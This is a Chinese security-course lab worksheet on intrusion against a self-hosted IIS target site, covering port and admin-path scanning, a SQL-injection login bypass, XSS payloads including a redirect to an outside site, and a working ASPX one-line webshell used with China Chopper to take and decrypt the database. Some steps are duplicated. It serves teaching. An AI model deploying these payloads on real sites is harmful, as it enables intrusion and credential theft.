第一章.1信息时代的安全威胁实验
?
?
第一章·2信息時代的安全威脅實驗?
實訓1-客入侵流程演練
實驗目的
深入理解網絡無安全的思想。
了解局域網查看軟件Lansee的使用方法。
了解端口掃描軟件AdvancedPortScanner的使用方法=了解Web后臺掃描軟件御劍的使用方法。
了解網站漏洞掃描工具AwvS的使用方法。了解webshell連接工具中國菜刀的使用方法。
掌握端口及漏洞掃描的基本知識,能夠利用工具進行掃描工作。掌握網站入侵的一般流程
實驗準備及注意事項
1.硬件:裝有windows操作系統的計算機1臺(關閉防火墻和殺毒軟件),接入某局域網。
2.軟件: LanSee AdvancedPortScanner 御劍后臺掃描工具﹑網站漏洞掃描工具 Awvs·中國菜刀。
3.嚴格按照實監步驟進行實驗,實驗結果以截圖的形式進行保留。
4.實驗后務必將相關工具軟件從機器徹底刪除,避免工具被惡意利用影響網絡正常使用。
實驗背景
局域網查看工具可掃描指定網段并探查共享文件,同時監控網絡內所有主機的在線情況。漏洞掃描是指基于漏洞數據庫,通過掃描等手段對指定的遠程或者本地計算機系統的安全脆弱性進行檢測,發現可利用的漏洞的一種安全檢測〔滲透攻擊)行為·配備漏洞掃描系統,網絡管理人員可以定期的進行網絡安全檢測服務安全檢測可幫助客戶最大可能的消除安全隱患,盡可能早地發現安全漏洞并進行修補,有效的利用已有系統,優化資源,提高網絡的運行效率。端口掃描是指向目標主機發送一組端口掃描消息,并了解其提供的計算機網絡服務類型(這些網絡服務均與端口號相關)·端口掃描是計算機解密高手喜歡的一種方式·攻擊者可以通過它了解到從哪里可探尋到攻擊弱點日實質上,端口掃描包括向每個端口發送消息,一次只發送一個消息·接收到的回應類型表示是否在使用該端口并且可由此探尋弱點·掃描器是一種自動檢測遠程或本地主機安全性弱點的程序,通過使用掃描器你可以不留痕跡的發現遠程服務器的各種TCP端口的分配及提供的服務和它們的軟件版本。這就能讓我們間接的或直觀的了解到遠程主機所存在的安全問題。后臺掃描即搜尋網站可能的后臺入口,字典掃描是常用的一種 web目錄掃描方法,類似于暴力破解,掃描結果是否理想取決于字典的大小。
?實驗準備
在windows上部署一個lIs web服務
安裝IS相關環境并利用IS服務器發布靶站源代碼〈注意應用程序池使用.net 4.0并開啟.NET服務)
?
?
?
?
?
實驗任務1網絡探查與端口掃描
局域網探查工具 LanSee
1﹑其他主機在局域網中共享一些文件。2·運行網絡查看工具 LanSee.exe 。3·點擊設置,輸入要探查的ip地址段4·點擊開始進行探查,觀察探查結果○端口掃描工具AdvancedPortScanner
1·打開AdvancedPortScanner軟件,在主界面中選擇Use range選項,填入準備掃描的網段或主機IP。2﹑選擇Options-Configuration命令,此時打開 Options對話框,在這里可以設置掃描屬性,包括掃描時延﹑線程優先級﹑線程數量﹑掃描IP/Port列表設置等選項。3﹑設置完成后點擊ok回到主界面,單機Scan按鈕,經過一段時間的等待,將顯示掃描結果。
1(簡答題)?利用局域網探查工具LanSee對所屬局域網網段進行探查,結果截圖
?
2(簡答題)?利用端口掃描工具AdvancedPortScanner對目標主機(部署了IIS Web服務)進行掃描,結果截圖
?
?
實驗任務2 Web掃描
網站后臺掃描工具御劍
1﹑打開御劍后臺掃描工具,輸入要掃描的網站域名。2﹑線程選擇2-4個,點擊開始掃描。
3﹑等待掃描結果。
網站漏洞掃描工具Awvs
1﹑安裝AwvS軟件并破解·
2·利用target finder功能掃描一個IP地址是否提供web服務,是否開啟80·443等端口。
3﹑利用web scanner功能掃描一個網站(自己搭建的靶站),觀察掃描結果(包括漏洞告警﹑網站結構、cookies等信息)
4、利用site crawler功能爬取網站的文件和目錄
1必答?(簡答題)?利用御劍后臺掃描工具對目標網址(自己部署的IIS Web服務)進行掃描,結果截圖
?
2必答?(簡答題)?利用網站漏洞掃描工具AWVS的web scanner功能對目標網址(自己部署的IIS Web服務)進行掃描,結果截圖
?
3必答?(簡答題)?利用網站漏洞掃描工具AWVS的site crawler功能對目標網址(自己部署的IIS Web服務)進行掃描,結果截圖
?
實驗任務3漏洞利用
網站后臺繞過
1·猜測網站的后臺管理地址或使用御劍孤獨后臺掃描工具暴力搜索進入后臺登錄界面。
2﹑嘗試使用弱密碼登錄系統,觀察登陸界面給出的反饋。
3·輸入一些特殊字符,如‘’/+-=等,點擊登錄,觀察系統反饋。4﹑根據登錄界面給出的反饋構造永真的SQL語句繞過登錄界面。5·進入網站后臺管理界面。
篡改頁面內容
1·在網站前臺或后臺中尋找能夠提交信息的合適位置。
2提交代碼<script>alert("test")</script>,使用另外的主機訪問此網站,觀察效果。
3﹑提交代碼:
<script>-window.location.href="http://d.mytanwan.com/h/26026.html"</script> ,觀察效果。
1必答?(單選題)?網站后臺管理頁面目錄名是什么?
- A.?
login
- B.?
admin
- C.?
index
- D.?
default
2必答?(簡答題)?網站使用了怎樣的管理員用戶名和弱密碼
用戶名admin密碼admin
3必答?(簡答題)?在靶站中,構造怎樣的輸入可以繞過用戶名密碼進入網站后臺?
?
?
4必答?(簡答題)?尋找能夠提交信息的合適位置,提交代碼:< script>window.location.href="http://d.mytanwan.com/h/26026.html"< /script>,結果截圖。
?
?
實驗任務4上傳東西
一句話馬的使用
1﹑新建文本文檔,將文件后綴修改為aspx,書寫內容如下:
<%@ Page Language="Jscript"%><%eval(Request.Item[ "pass"],"unsafe"");%>2·在系統中尋找文件上傳點。
3﹑上傳之前創建的aspx一句話馬文件。
4﹑設法獲得上傳文件在網站目錄中的文件名稱和路徑。5·利用中國菜刀工具連接一句話馬(密碼為pass) 6·獲得目標服務器的操作權限并拿到數據庫文件。7、對數據庫中的賬號密碼進行解密。
1·在網站前臺或后臺中尋找能夠提交信息的合適位置。
2提交代碼<script>alert("test")</script>,使用另外的主機訪問此網站,觀察效果。
3﹑提交代碼:
<script>-window.location.href="http://d.mytanwan.com/h/26026.html"</script> ,觀察效果。
1必答?(簡答題)?在靶站中上傳的馬文件路徑及文件名稱是?
?
?
2必答?(簡答題)?利用中國菜刀連接一句話,成功后的界面截圖,觀察能夠進行哪些操作
?
?
3必答?(簡答題)?數據庫文件名稱是什么,里面保存的用戶口令是什么樣子的?
?
?
?
?
總結
以上是生活随笔為你收集整理的第一章.1信息时代的安全威胁实验的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Office 2007集成SP2补丁
- 下一篇: 表面粗糙度的基本评定参数是_表面粗糙度评